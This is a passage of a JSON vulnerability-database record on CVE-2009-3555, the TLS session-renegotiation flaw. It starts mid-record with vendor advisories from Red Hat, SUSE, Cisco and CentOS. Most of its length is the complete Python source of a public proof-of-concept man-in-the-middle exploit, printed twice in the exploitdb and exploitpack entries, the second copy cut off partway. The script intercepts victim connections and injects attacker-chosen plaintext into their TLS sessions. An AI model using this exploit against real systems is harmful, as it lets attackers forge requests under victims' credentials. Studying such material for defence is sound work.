issue.\n(BZ#572577)\n\nAll users of java-1.4.2-ibm are advised to upgrade to these updated\npackages, which contain the IBM 1.4.2 SR13-FP4 Java release. All running\ninstances of IBM Java must be restarted for this update to take effect.", "modified": "2018-05-26T04:26:19", "published": "2010-03-17T04:00:00", "id": "RHSA-2010:0155", "href": "https://access.redhat.com/errata/RHSA-2010:0155", "type": "redhat", "title": "(RHSA-2010:0155) Moderate: java-1.4.2-ibm security and bug fix update", "cvss": {"score": 5.8, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:P"}}, {"lastseen": "2019-08-13T18:45:24", "bulletinFamily": "unix", "cvelist": ["CVE-2009-3555"], "description": "OpenSSL is a toolkit that implements the Secure Sockets Layer (SSL v2/v3)\nand Transport Layer Security (TLS v1) protocols, as well as a\nfull-strength, general purpose cryptography library.\n\nA flaw was found in the way the TLS/SSL (Transport Layer Security/Secure\nSockets Layer) protocols handled session renegotiation. A man-in-the-middle\nattacker could use this flaw to prefix arbitrary plain text to a client's\nsession (for example, an HTTPS connection to a website). This could force\nthe server to process an attacker's request as if authenticated using the\nvictim's credentials. This update addresses this flaw by implementing the\nTLS Renegotiation Indication Extension, as defined in RFC 5746.\n(CVE-2009-3555)\n\nRefer to the following Knowledgebase article for additional details about\nthis flaw: http://kbase.redhat.com/faq/docs/DOC-20491\n\nAll openssl097a users should upgrade to these updated packages, which\ncontain a backported patch to resolve this issue. For the update to take\neffect, all services linked to the openssl097a library must be restarted,\nor the system rebooted.", "modified": "2017-09-08T12:19:40", "published": "2010-03-25T04:00:00", "id": "RHSA-2010:0164", "href": "https://access.redhat.com/errata/RHSA-2010:0164", "type": "redhat", "title": "(RHSA-2010:0164) Moderate: openssl097a security update", "cvss": {"score": 5.8, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:P"}}], "suse": [{"lastseen": "2016-09-04T12:25:49", "bulletinFamily": "unix", "cvelist": ["CVE-2009-3555"], "description": "The TLS/SSLv3 protocol as implemented in openssl prior to this update was not able to associate already sent data to a renegotiated connection. This allowed man-in-the-middle attackers to inject HTTP requests in a HTTPS session without being noticed. For example Apache's mod_ssl was vulnerable to this kind of attack because it uses openssl. It is believed that this vulnerability is actively exploited in the wild to get access to HTTPS protected web-sites. Please note that renegotiation will be disabled for any application using openssl by this update and may cause problems in some cases. Additionally this attack is not limited to HTTP.\n#### Solution\nThere is no work-around known. Please install the update. Moblin packages will be released later.", "edition": 1, "modified": "2009-11-18T09:50:39", "published": "2009-11-18T09:50:39", "id": "SUSE-SA:2009:057", "href": "http://lists.opensuse.org/opensuse-security-announce/2009-11/msg00009.html", "type": "suse", "title": "man-in-the-middle attack in openssl", "cvss": {"score": 5.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:PARTIAL/"}}], "cisco": [{"lastseen": "2020-12-24T11:42:04", "bulletinFamily": "software", "cvelist": ["CVE-2009-3555"], "description": "Multiple Transport Layer Security (TLS) implementations contain a vulnerability when renegotiating a TLS session that could allow an unauthenticated, remote attacker to conduct a man-in-the-middle attack.\n\nThe vulnerability exists during a TLS renegotiation process. If an attacker can intercept traffic from a client to a TLS server, the attacker could stage a rogue TLS server to intercept that traffic and appear to authenticate the client to what the client thinks is the desired TLS server. The attacker is then able to authenticate to the legitimate TLS server and thus stage a man-in-the-middle attack. However, the attacker would not be able to view the contents of the session and would only be able to inject data or requests into it.\n\nProof-of-concept code that exploits this vulnerability is publicly available.\n\nOpenSSL has confirmed this vulnerability in a changelog and released updated software.\n\nTo exploit this vulnerability, the attacker must be able to intercept traffic from a TLS client to a TLS server. In many cases, this may require the attacker to have access to a network that is adjacent to the targeted user's system. Another possibility would be for the attacker to have access to a network that is adjacent to a legitimate TLS server.\n\nThis vulnerability is likely to affect multiple implementations of TLS.", "modified": "2012-08-14T16:24:54", "published": "2009-11-05T19:53:52", "id": "CISCO-SA-20091105-CVE-2009-3555", "href": "https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/Cisco-SA-20091105-CVE-2009-3555", "type": "cisco", "title": "Transport Layer Security Renegotiation Remote Man-in-the-Middle Attack Vulnerability", "cvss": {"score": 5.8, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:P"}}], "centos": [{"lastseen": "2019-12-20T18:25:54", "bulletinFamily": "unix", "cvelist": ["CVE-2009-3555"], "description": "**CentOS Errata and Security Advisory** CESA-2010:0164\n\n\nOpenSSL is a toolkit that implements the Secure Sockets Layer (SSL v2/v3)\nand Transport Layer Security (TLS v1) protocols, as well as a\nfull-strength, general purpose cryptography library.\n\nA flaw was found in the way the TLS/SSL (Transport Layer Security/Secure\nSockets Layer) protocols handled session renegotiation. A man-in-the-middle\nattacker could use this flaw to prefix arbitrary plain text to a client's\nsession (for example, an HTTPS connection to a website). This could force\nthe server to process an attacker's request as if authenticated using the\nvictim's credentials. This update addresses this flaw by implementing the\nTLS Renegotiation Indication Extension, as defined in RFC 5746.\n(CVE-2009-3555)\n\nRefer to the following Knowledgebase article for additional details about\nthis flaw: http://kbase.redhat.com/faq/docs/DOC-20491\n\nAll openssl097a users should upgrade to these updated packages, which\ncontain a backported patch to resolve this issue. For the update to take\neffect, all services linked to the openssl097a library must be restarted,\nor the system rebooted.\n\n**Merged security bulletin from advisories:**\nhttp://lists.centos.org/pipermail/centos-announce/2010-March/028633.html\nhttp://lists.centos.org/pipermail/centos-announce/2010-March/028634.html\n\n**Affected packages:**\nopenssl097a\n\n**Upstream details at:**\n", "edition": 3, "modified": "2010-03-27T17:44:36", "published": "2010-03-27T17:44:36", "href": "http://lists.centos.org/pipermail/centos-announce/2010-March/028633.html", "id": "CESA-2010:0164", "title": "openssl097a security update", "type": "centos", "cvss": {"score": 5.8, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:P"}}, {"lastseen": "2019-12-20T18:24:56", "bulletinFamily": "unix", "cvelist": ["CVE-2009-3555"], "description": "**CentOS Errata and Security Advisory** CESA-2010:0165\n\n\nNetwork Security Services (NSS) is a set of libraries designed to support\nthe cross-platform development of security-enabled client and server\napplications. Applications built with NSS can support SSLv2, SSLv3, TLS,\nand other security standards.\n\nNetscape Portable Runtime (NSPR) provides platform independence for non-GUI\noperating system facilities. These facilities include threads, thread\nsynchronization, normal file and network I/O, interval timing, calendar\ntime, basic memory management (malloc and free), and shared library\nlinking.\n\nA flaw was found in the way the TLS/SSL (Transport Layer Security/Secure\nSockets Layer) protocols handled session renegotiation. A man-in-the-middle\nattacker could use this flaw to prefix arbitrary plain text to a client's\nsession (for example, an HTTPS connection to a website). This could force\nthe server to process an attacker's request as if authenticated using the\nvictim's credentials. This update addresses this flaw by implementing the\nTLS Renegotiation Indication Extension, as defined in RFC 5746.\n(CVE-2009-3555)\n\nRefer to the following Knowledgebase article for additional details about\nthis flaw: http://kbase.redhat.com/faq/docs/DOC-20491\n\nUsers of Red Hat Certificate System 7.3 and 8.0 should review the following\nKnowledgebase article before installing this update:\nhttp://kbase.redhat.com/faq/docs/DOC-28439\n\nAll users of NSS are advised to upgrade to these updated packages, which\nupdate NSS to version 3.12.6. This erratum also updates the NSPR packages\nto the version required by NSS 3.12.6. All running applications using the\nNSS library must be restarted for this update to take effect.\n\n**Merged security bulletin from advisories:**\nhttp://lists.centos.org/pipermail/centos-announce/2010-March/028639.html\nhttp://lists.centos.org/pipermail/centos-announce/2010-March/028640.html\nhttp://lists.centos.org/pipermail/centos-announce/2010-March/028645.html\nhttp://lists.centos.org/pipermail/centos-announce/2010-March/028646.html\n\n**Affected packages:**\nnspr\nnspr-devel\nnss\nnss-devel\nnss-pkcs11-devel\nnss-tools\n\n**Upstream details at:**\n\nhttps://rhn.redhat.com/errata/RHSA-2010-0165.html", "edition": 3, "modified": "2010-03-28T20:10:58", "published": "2010-03-28T15:36:50", "href": "http://lists.centos.org/pipermail/centos-announce/2010-March/028640.html", "id": "CESA-2010:0165", "title": "nspr, nss security update", "type": "centos", "cvss": {"score": 5.8, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:P"}}], "exploitdb": [{"lastseen": "2016-02-01T12:46:47", "description": "TLS Renegotiation Vulnerability PoC Exploit. CVE-2009-3555. Remote exploits for multiple platform", "published": "2009-12-21T00:00:00", "type": "exploitdb", "title": "TLS Renegotiation Vulnerability PoC", "bulletinFamily": "exploit", "cvelist": ["CVE-2009-3555"], "modified": "2009-12-21T00:00:00", "id": "EDB-ID:10579", "href": "https://www.exploit-db.com/exploits/10579/", "sourceData": "#!/usr/bin/env python\r\n\r\n######################################\r\n# #\r\n# RedTeam Pentesting GmbH #\r\n# kontakt@redteam-pentesting.de #\r\n# http://www.redteam-pentesting.de #\r\n# #\r\n######################################\r\n\r\n# PoC exploit for the TLS renegotiation vulnerability (CVE-2009-3555)\r\n\r\n# License\r\n# -------\r\n# CC-BY-SA http://creativecommons.org/licenses/by-sa/3.0/\r\n\r\n# Timeline\r\n# --------\r\n# 2009-12-21 initial public release\r\n\r\n# Known Issues\r\n# ------------\r\n# Firefox: if it fails connecting to a TLS site too often, falls back to\r\n# issuing SSLv2 ClientHello only until browser is restarted\r\n#\r\n# wget: attempts SSLv2 ClientHello by default\r\n\r\n# References\r\n# ----------\r\n# http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3555\r\n# http://www.phonefactor.com/sslgap\r\n# http://www.extendedsubset.com/\r\n# http://www.g-sec.lu/practicaltls.pdf\r\n# http://tools.ietf.org/html/draft-ietf-tls-renegotiation-01\r\n\r\nimport tlslite\r\nimport tlslite.api\r\nimport tlslite.messages\r\nimport tlslite.constants\r\nimport struct\r\nimport socket\r\nimport threading\r\nimport array\r\nimport sys\r\nimport optparse\r\n\r\n\r\nif not hasattr(threading.Thread, 'name'):\r\n # emulate python 2.6 threading module for earlier versions\r\n threading.current_thread = threading.currentThread\r\n setattr(threading.Thread, 'name',\r\n property(threading.Thread.getName, threading.Thread.setName))\r\n\r\ndef forward(sock1, sock2):\r\n sock1.settimeout(1.0)\r\n while True:\r\n try:\r\n data = sock1.recv(4096)\r\n if not data:\r\n return\r\n sock2.send(data)\r\n except socket.error, ex_error:\r\n if ex_error[0] == 104: # Connection reset by peer\r\n return\r\n except socket.timeout, ex_timeout:\r\n pass\r\n\r\n\r\nclass MessageWrapper(object):\r\n def __init__(self, version = (3, 1), ssl2 = False):\r\n self.contentType = tlslite.messages.ContentType.handshake\r\n self.ssl2 = ssl2\r\n self.client_version = version\r\n\r\n def setType(self, type):\r\n self.contentType = type\r\n\r\n def addBytes(self, bytes):\r\n self.bytes = bytes\r\n\r\n def write(self, trial=False):\r\n if trial:\r\n raise Exception('Unsupported')\r\n return array.array('B', self.bytes)\r\n\r\ndef send_record(sock, msg_type, version_major, version_minor, record):\r\n msg = struct.pack('!BBBH', msg_type, version_major, version_minor, len(record))\r\n if type(record) != str:\r\n msg += record.tostring()\r\n else:\r\n msg += record\r\n sock.send(msg)\r\n\r\ndef send_encapsulated(sslsock, type, messagebytes, version = (3, 1)):\r\n msg = MessageWrapper(version)\r\n msg.addBytes(struct.unpack('B'*len(messagebytes), messagebytes))\r\n msg.setType(type)\r\n for dummy in sslsock._sendMsg(msg, True):\r\n pass\r\n\r\ndef decrypt_record(sslsock, type, recordbytes):\r\n for result in sslsock._decryptRecord(type, array.array('B', recordbytes)):\r\n pass\r\n return result\r\n\r\ndef recv_record(sock):\r\n try:\r\n header = sock.recv(5)\r\n if not header:\r\n return None, None, None, None\r\n msg_type, msg_version_major, msg_version_minor, msg_length = struct.unpack('!BBBH', header)\r\n record = ''\r\n while len(record) != msg_length:\r\n record += sock.recv(msg_length - len(record))\r\n return msg_type, msg_version_major, msg_version_minor, record\r\n except socket.error, ex:\r\n if ex[0] == 104: # Connection reset by peer\r\n return\r\n\r\ndef recv_clienthello(sock):\r\n header_bytes = []\r\n header_bytes.append(sock.recv(1))\r\n header_bytes[0] = struct.unpack('!B', header_bytes[0])[0]\r\n if header_bytes[0] & 0x80:\r\n # Version 2.0 Client \"Record Layer\"\r\n header_bytes.append(sock.recv(1))\r\n header_bytes[1] = struct.unpack('!B', header_bytes[1])[0]\r\n msg_length = (header_bytes[0] & 0x7f) << 8 | header_bytes[1]\r\n msg_version_major = 2\r\n msg_version_minor = 0\r\n msg_type = tlslite.constants.ContentType.handshake\r\n record = sock.recv(msg_length)\r\n else:\r\n header = sock.recv(4)\r\n msg_type = header_bytes[0]\r\n msg_version_major, msg_version_minor, msg_length = struct.unpack('!BBH', header)\r\n record = sock.recv(msg_length)\r\n\r\n return msg_type, msg_version_major, msg_version_minor, record\r\n\r\ndef send_hello_request(sock):\r\n sock.send(\"\\x16\" # Record Layer: Handshake Message\r\n +\"\\x03\\x01\" # Record Layer Version: TLS 1.0\r\n +\"\\x00\\x04\" # Record Layer Length: 4\r\n +\"\\x00\" # Handshake Message Type: Hello Request\r\n +\"\\x00\\x00\\x00\") # Handshake Message Length: 0\r\n\r\ndef send_protocol_version_alert(sock):\r\n sock.send(\"\\x15\" # Record Layer: Alert\"\r\n +\"\\x03\\x01\" # Record Layer Version: TLS 1.0\r\n +\"\\x00\\x02\" # Record Layer Length: 2\r\n +\"\\x00\" # Alert Message: fatal\r\n +\"\\x46\") # Alert Message: protocol version\r\n\r\n\r\ndef handle_victim(victim, options, mitmcount):\r\n\r\n if options.one_shot and mitmcount != 0:\r\n print threading.current_thread().name, '--one-shot specified and initial connection already handled, forwarding only'\r\n sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\r\n try:\r\n sock.connect(options.target)\r\n print threading.current_thread().name, 'Connected to target %s:%u' % options.target\r\n except socket.error, ex:\r\n print threading.current_thread().name, 'Couldn\\'t connect to target %s:%u' % options.target\r\n print threading.current_thread().name, 'Error code %u, \\'%s\\'' % (ex[0], ex[1])\r\n sys.exit(1)\r\n\r\n t1 = threading.Thread(target=forward, args=(sock, victim))\r\n t1.start()\r\n\r\n t2 = threading.Thread(target=forward, args=(victim, sock))\r\n t2.start()\r\n\r\n t1.join()\r\n sock.close()\r\n\r\n t2.join()\r\n victim.close()\r\n return\r\n\r\n # obtain initial \"client hello\" message\r\n msg_type, msg_version_major, msg_version_minor, hello_msg = recv_clienthello(victim)\r\n if msg_version_major == 2:\r\n print threading.current_thread().name, \"client sent SSLv2 client hello message, exiting thread\"\r\n return\r\n\r\n tls_version = (msg_version_major, msg_version_minor)\r\n type, length, version_major, version_minor, random, session_id_length = struct.unpack('!B3sBB32sB', hello_msg[:39])\r\n resume_session = (session_id_length != 0)\r\n if resume_session:\r\n print threading.current_thread().name, \"client attempting to resume session\"\r\n\r\n sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\r\n try:\r\n sock.connect(options.target)\r\n print threading.current_thread().name, 'Connected to target %s:%u' % options.target\r\n except socket.error, ex:\r\n print threading.current_thread().name, 'Couldn\\'t connect to target %s:%u' % options.target\r\n print threading.current_thread().name, 'Error code %u, \\'%s\\'' % (ex[0], ex[1])\r\n sys.exit(1)\r\n\r\n\r\n sslsock = tlslite.api.TLSConnection(sock)\r\n handshake_settings = tlslite.HandshakeSettings.HandshakeSettings()\r\n handshake_settings.minVersion = tls_version\r\n handshake_settings.maxVersion = tls_version\r\n sslsock.handshakeClientCert(settings = handshake_settings)\r\n\r\n # inject prefix\r\n sslsock.write(options.inject)\r\n print threading.current_thread().name, 'Injected %s' % repr(options.inject)\r\n\r\n # send original \"client hello\" message over the encrypted channel\r\n send_encapsulated(sslsock, 22, hello_msg, tls_version)\r\n\r\n # now receive serveral TLS messages from the server, decrypt them, and forward\r\n # them to the client, until the server sends \"server hello done\"\r\n # these messages include \"server hello\", \"certificate\", \"server key exchange\",\r\n # unless the client is trying to resume a previous session\r\n print threading.current_thread().name, \"about to receive server handshake messages\"\r\n server_handshake_done = False\r\n while not server_handshake_done:\r\n msg_type, msg_version_major, msg_version_minor, result = recv_record(sslsock.sock)\r\n if result:\r\n result = decrypt_record(sslsock, msg_type, result)\r\n send_record(victim, msg_type, msg_version_major, msg_version_minor, result)\r\n if result[0] == 0x0e: # server hello done - should terminate handshake\r\n server_handshake_done = True\r\n elif resume_session and msg_type == 0x14: # change cipher spec - probably irrelevant\r\n server_handshake_done = True\r\n else:\r\n print threading.current_thread().name, 'receive from server failed, exiting thread'\r\n return\r\n print threading.current_thread().name, \"server handshake done\"\r\n\r\n\r\n # now its the the client's turn to send some messages, e.g.\r\n # \"client key exchange\" and \"change cipher spec\"\r\n print threading.current_thread().name, \"about to receive client handshake messages\"\r\n handshake_finished = False\r\n while not handshake_finished:\r\n msg_type, msg_version_major, msg_version_minor, record = recv_record(victim)\r\n print threading.current_thread().name, msg_type\r\n send_encapsulated(sslsock, msg_type, record, tls_version)\r\n if msg_type == 0x14: # change cipher spec\r\n handshake_finished = True\r\n\r\n print threading.current_thread().name, \"client handshake done\"\r\n\r\n # message after \"change cipher spec\" must be sent in the \"clear\"\r\n msg_type, msg_version_major, msg_version_minor, record = recv_record(victim)\r\n send_record(sslsock.sock, msg_type, msg_version_major, msg_version_minor, record)\r\n\r\n # server should now send \"change cipher spec\" message, we decrypt and send that to the victim\r\n msg_type, msg_version_major, msg_version_minor, record = recv_record(sslsock.sock)\r\n result = decrypt_record(sslsock, msg_type, record)\r\n send_record(victim, msg_type, msg_version_major, msg_version_minor, result)\r\n\r\n # finalize handshake\r\n msg_type, msg_version_major, msg_version_minor, record = recv_record(sslsock.sock)\r\n if record:\r\n send_record(victim, msg_type, msg_version_major, msg_version_minor, record)\r\n else:\r\n sslsock.sock.close()\r\n victim.close()\r\n del sslsock\r\n return\r\n\r\n\r\n\r\n # the rest is just forwarding TLS records between both parties,\r\n # which we cannot interfere with anymore, apart from dropping server\r\n # responses\r\n if options.drop:\r\n sslsock.sock.close()\r\n del sslsock\r\n else:\r\n t1 = threading.Thread(target=forward, args=(sslsock.sock, victim))\r\n t1.start()\r\n\r\n t2 = threading.Thread(target=forward, args=(victim, sslsock.sock))\r\n t2.start()\r\n\r\n if not options.drop:\r\n t1.join()\r\n sslsock.sock.close()\r\n\r\n t2.join()\r\n victim.close()\r\n\r\n\r\n\r\nif __name__ == \"__main__\":\r\n parser = optparse.OptionParser()\r\n parser.add_option('-l', '--listen', dest='listen_port', help='port to listen on', metavar='PORT', type='int', default=8443)\r\n parser.add_option('-b', '--bind', dest='bind_address', help='address to bind to', metavar='ADDRESS', default='0.0.0.0')\r\n parser.add_option('-t', '--target', dest='target', help='host and port to connect to', metavar='HOST:PORT' )\r\n parser.add_option('-i', '--inject', dest='inject', help='string to inject', metavar='DATA')\r\n parser.add_option('', '--inject-file', dest='inject_file', help='inject data from a file', metavar='FILE')\r\n parser.add_option('', '--inject-base64', dest='inject_base64', help='string to inject, base64-encoded', metavar='DATA')\r\n parser.add_option('-o', '--one-shot', dest='one_shot', action='store_true', help='only mitm the first connection attempt, forward all other connections')\r\n parser.add_option('-d', '--drop-responses', dest='drop', action=\"store_true\", default=False, help='drop server responses after renegotiating')\r\n\r\n (options, args) = parser.parse_args()\r\n\r\n if len([i for i in (options.inject, options.inject_file, options.inject_base64) if i]) != 1:\r\n print 'Exactly one injection option must be specified'\r\n sys.exit(1)\r\n\r\n if options.inject_file:\r\n try:\r\n options.inject = open(options.inject_file, 'r').read()\r\n except IOError, ex:\r\n print ex\r\n sys.exit(1)\r\n\r\n if options.inject_base64:\r\n import base64\r\n try:\r\n options.inject = base64.decodestring(options.inject_base64)\r\n except base64.binascii.Error, ex:\r\n print 'Error decoding base64 data: %s' % ex\r\n sys.exit(1)\r\n\r\n\r\n if not options.listen_port or \\\r\n not options.bind_address or \\\r\n not options.target or \\\r\n not options.inject:\r\n parser.print_help()\r\n sys.exit(1)\r\n\r\n target = options.target.split(':')\r\n if len(target)==2:\r\n try:\r\n target[1] = int(target[1])\r\n except ValueError:\r\n target[1] = None\r\n if len(target)!=2 or not target[0] or not target[1]:\r\n print 'Target \\'%s\\' not in format HOST:PORT' % options.target\r\n sys.exit(1)\r\n\r\n options.target = tuple(target)\r\n\r\n try:\r\n listensocket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\r\n listensocket.bind((options.bind_address, options.listen_port))\r\n print 'Listening on %s:%u' % (options.bind_address, options.listen_port)\r\n except socket.error, ex:\r\n print 'Couldn\\'t listen on %s:%u' % (options.bind_address, options.listen_port)\r\n print 'Error code %u, \\'%s\\'' % (ex[0], ex[1])\r\n sys.exit(1)\r\n\r\n listensocket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)\r\n listensocket.listen(5)\r\n\r\n mitmcount = 0\r\n\r\n while True:\r\n try:\r\n victim, victimaddr = listensocket.accept()\r\n print 'New connection from %s:%u' % victimaddr\r\n\r\n threading.Thread(target=handle_victim, args=(victim, options, mitmcount)).start()\r\n mitmcount += 1\r\n\r\n except KeyboardInterrupt, ex:\r\n print '\\nAborted by user, exiting...'\r\n listensocket.close()\r\n sys.exit(1)\r\n\r\n", "cvss": {"score": 5.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/10579/"}], "exploitpack": [{"lastseen": "2020-04-01T19:04:50", "description": "\nTLS - Renegotiation", "edition": 1, "published": "2009-12-21T00:00:00", "title": "TLS - Renegotiation", "type": "exploitpack", "bulletinFamily": "exploit", "cvelist": ["CVE-2009-3555"], "modified": "2009-12-21T00:00:00", "id": "EXPLOITPACK:8B4E7E8DAE5A13C8250C6C33307CD66C", "href": "", "sourceData": "#!/usr/bin/env python\n\n######################################\n# #\n# RedTeam Pentesting GmbH #\n# kontakt@redteam-pentesting.de #\n# http://www.redteam-pentesting.de #\n# #\n######################################\n\n# PoC exploit for the TLS renegotiation vulnerability (CVE-2009-3555)\n\n# License\n# -------\n# CC-BY-SA http://creativecommons.org/licenses/by-sa/3.0/\n\n# Timeline\n# --------\n# 2009-12-21 initial public release\n\n# Known Issues\n# ------------\n# Firefox: if it fails connecting to a TLS site too often, falls back to\n# issuing SSLv2 ClientHello only until browser is restarted\n#\n# wget: attempts SSLv2 ClientHello by default\n\n# References\n# ----------\n# http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3555\n# http://www.phonefactor.com/sslgap\n# http://www.extendedsubset.com/\n# http://www.g-sec.lu/practicaltls.pdf\n# http://tools.ietf.org/html/draft-ietf-tls-renegotiation-01\n\nimport tlslite\nimport tlslite.api\nimport tlslite.messages\nimport tlslite.constants\nimport struct\nimport socket\nimport threading\nimport array\nimport sys\nimport optparse\n\n\nif not hasattr(threading.Thread, 'name'):\n # emulate python 2.6 threading module for earlier versions\n threading.current_thread = threading.currentThread\n setattr(threading.Thread, 'name',\n property(threading.Thread.getName, threading.Thread.setName))\n\ndef forward(sock1, sock2):\n sock1.settimeout(1.0)\n while True:\n try:\n data = sock1.recv(4096)\n if not data:\n return\n sock2.send(data)\n except socket.error, ex_error:\n if ex_error[0] == 104: # Connection reset by peer\n return\n except socket.timeout, ex_timeout:\n pass\n\n\nclass MessageWrapper(object):\n def __init__(self, version = (3, 1), ssl2 = False):\n self.contentType = tlslite.messages.ContentType.handshake\n self.ssl2 = ssl2\n self.client_version = version\n\n def setType(self, type):\n self.contentType = type\n\n def addBytes(self, bytes):\n self.bytes = bytes\n\n def write(self, trial=False):\n if trial:\n raise Exception('Unsupported')\n return array.array('B', self.bytes)\n\ndef send_record(sock, msg_type, version_major, version_minor, record):\n msg = struct.pack('!BBBH', msg_type, version_major, version_minor, len(record))\n if type(record) != str:\n msg += record.tostring()\n else:\n msg += record\n sock.send(msg)\n\ndef send_encapsulated(sslsock, type, messagebytes, version = (3, 1)):\n msg = MessageWrapper(version)\n msg.addBytes(struct.unpack('B'*len(messagebytes), messagebytes))\n msg.setType(type)\n for dummy in sslsock._sendMsg(msg, True):\n pass\n\ndef decrypt_record(sslsock, type, recordbytes):\n for result in sslsock._decryptRecord(type, array.array('B', recordbytes)):\n pass\n return result\n\ndef recv_record(sock):\n try:\n header = sock.recv(5)\n if not header:\n return None, None, None, None\n msg_type, msg_version_major, msg_version_minor, msg_length = struct.unpack('!BBBH', header)\n record = ''\n while len(record) != msg_length:\n record += sock.recv(msg_length - len(record))\n return msg_type, msg_version_major, msg_version_minor, record\n except socket.error, ex:\n if ex[0] == 104: # Connection reset by peer\n return\n\ndef recv_clienthello(sock):\n header_bytes = []\n header_bytes.append(sock.recv(1))\n header_bytes[0] = struct.unpack('!B', header_bytes[0])[0]\n if header_bytes[0] & 0x80:\n # Version 2.0 Client \"Record Layer\"\n header_bytes.append(sock.recv(1))\n header_bytes[1] = struct.unpack('!B', header_bytes[1])[0]\n msg_length = (header_bytes[0] & 0x7f) << 8 | header_bytes[1]\n msg_version_major = 2\n msg_version_minor = 0\n msg_type = tlslite.constants.ContentType.handshake\n record = sock.recv(msg_length)\n else:\n header = sock.recv(4)\n msg_type = header_bytes[0]\n msg_version_major, msg_version_minor, msg_length = struct.unpack('!BBH', header)\n record = sock.recv(msg_length)\n\n return msg_type, msg_version_major, msg_version_minor, record\n\ndef send_hello_request(sock):\n sock.send(\"\\x16\" # Record Layer: Handshake Message\n +\"\\x03\\x01\" # Record Layer Version: TLS 1.0\n +\"\\x00\\x04\" # Record Layer Length: 4\n +\"\\x00\" # Handshake Message Type: Hello Request\n +\"\\x00\\x00\\x00\") # Handshake Message Length: 0\n\ndef send_protocol_version_alert(sock):\n sock.send(\"\\x15\" # Record Layer: Alert\"\n +\"\\x03\\x01\" # Record Layer Version: TLS 1.0\n +\"\\x00\\x02\" # Record Layer Length: 2\n +\"\\x00\" # Alert Message: fatal\n +\"\\x46\") # Alert Message: protocol version\n\n\ndef handle_victim(victim, options, mitmcount):\n\n if options.one_shot and mitmcount != 0:\n print threading.current_thread().name, '--one-shot specified and initial connection already handled, forwarding only'\n sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n try:\n sock.connect(options.target)\n print threading.current_thread().name, 'Connected to target %s:%u' % options.target\n except socket.error, ex:\n print threading.current_thread().name, 'Couldn\\'t connect to target %s:%u' % options.target\n print threading.current_thread().name, 'Error code %u, \\'%s\\'' % (ex[0], ex[1])\n sys.exit(1)\n\n t1 = threading.Thread(target=forward, args=(sock, victim))\n t1.start()\n\n t2 = threading.Thread(target=forward, args=(victim, sock))\n t2.start()\n\n t1.join()\n sock.close()\n\n t2.join()\n victim.close()\n return\n\n # obtain initial \"client hello\" message\n msg_type, msg_version_major, msg_version_minor, hello_msg = recv_clienthello(victim)\n if msg_version_major == 2:\n print threading.current_thread().name, \"client sent SSLv2 client hello message, exiting thread\"\n return\n\n tls_version = (msg_version_major, msg_version_minor)\n type, length, version_major, version_minor, random, session_id_length = struct.unpack('!B3sBB32sB', hello_msg[:39])\n resume_session = (session_id_length != 0)\n if resume_session:\n print threading.current_thread().name, \"client attempting to resume session\"\n\n sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n try:\n sock.connect(options.target)\n print threading.current_thread().name, 'Connected to target %s:%u' % options.target\n except socket.error, ex:\n print threading.current_thread().name, 'Couldn\\'t connect to target %s:%u' % options.target\n print threading.current_thread().name, 'Error code %u, \\'%s\\'' % (ex[0], ex[1])\n sys.exit(1)\n\n\n sslsock = tlslite.api.TLSConnection(sock)\n handshake_settings = tlslite.HandshakeSettings.HandshakeSettings()\n handshake_settings.minVersion = tls_version\n handshake_settings.maxVersion = tls_version\n sslsock.handshakeClientCert(settings = handshake_settings)\n\n # inject prefix\n sslsock.write(options.inject)\n print threading.current_thread().name, 'Injected %s' % repr(options.inject)\n\n # send original \"client hello\" message over the encrypted channel\n send_encapsulated(sslsock, 22, hello_msg, tls_version)\n\n # now receive serveral TLS messages from the server, decrypt them, and forward\n # them to the client, until the server sends \"server hello done\"\n # these messages include \"server hello\", \"certificate\", \"server key exchange\",\n # unless the client is trying to resume a previous session\n print threading.current_thread().name, \"about to receive server handshake messages\"\n server_handshake_done = False\n while not server_handshake_done:\n msg_type, msg_version_major, msg_version_minor, result = recv_record(sslsock.sock)\n if result:\n result = decrypt_record(sslsock, msg_type, result)\n send_record(victim, msg_type, msg_version_major, msg_version_minor, result)\n if result[0] == 0x0e: # server hello done - should terminate handshake\n server_handshake_done = True\n elif resume_session and msg_type == 0x14: # change cipher spec - probably irrelevant\n server_handshake_done = True\n else:\n print threading.current_thread().name, 'receive from server failed, exiting thread'\n return\n print threading.current_thread().name, \"server handshake done\"\n\n\n # now its the the client's turn to send some messages, e.g.\n # \"client key exchange\" and \"change cipher spec\"\n print threading.current_thread().name, \"about to receive client handshake messages\"\n handshake_finished = False\n while not handshake_finished:\n msg_type, msg_version_major, msg_version_minor, record = recv_record(victim)\n print threading.current_thread().name, msg_type\n send_encapsulated(sslsock, msg_type, record, tls_version)\n if msg_type == 0x14: # change cipher spec\n handshake_finished = True\n\n print threading.current_thread().name, \"client handshake done\"\n\n # message after \"change cipher spec\" must be sent in the \"clear\"\n msg_type, msg_version_major, msg_version_minor, record = recv_record(victim)\n send_record(sslsock.sock, msg_type, msg_version_major, msg_version_minor, record)\n\n # server should now send \"change cipher spec\" message, we decrypt and send that to the victim\n msg_type, msg_version_major, msg_version_minor, record = recv_record(sslsock.sock)\n result = decrypt_record(sslsock, msg_type, record)\n send_record(victim, msg_type, msg_version_major, msg_version_minor, result)\n\n # finalize handshake\n msg_type, msg_version_major, msg_version_minor, record = recv_record(sslsock.sock)\n if record:\n send_record(victim, msg_type, msg_version_major, msg_version_minor, record)\n else:\n sslsock.sock.close()\n victim.close()\n del sslsock\n return\n\n\n\n # the rest is just forwarding TLS records between both parties,\n # which we cannot interfere with anymore, apart from dropping server\n # responses\n if options.drop:\n sslsock.sock.close()\n del sslsock\n else:\n t1 = 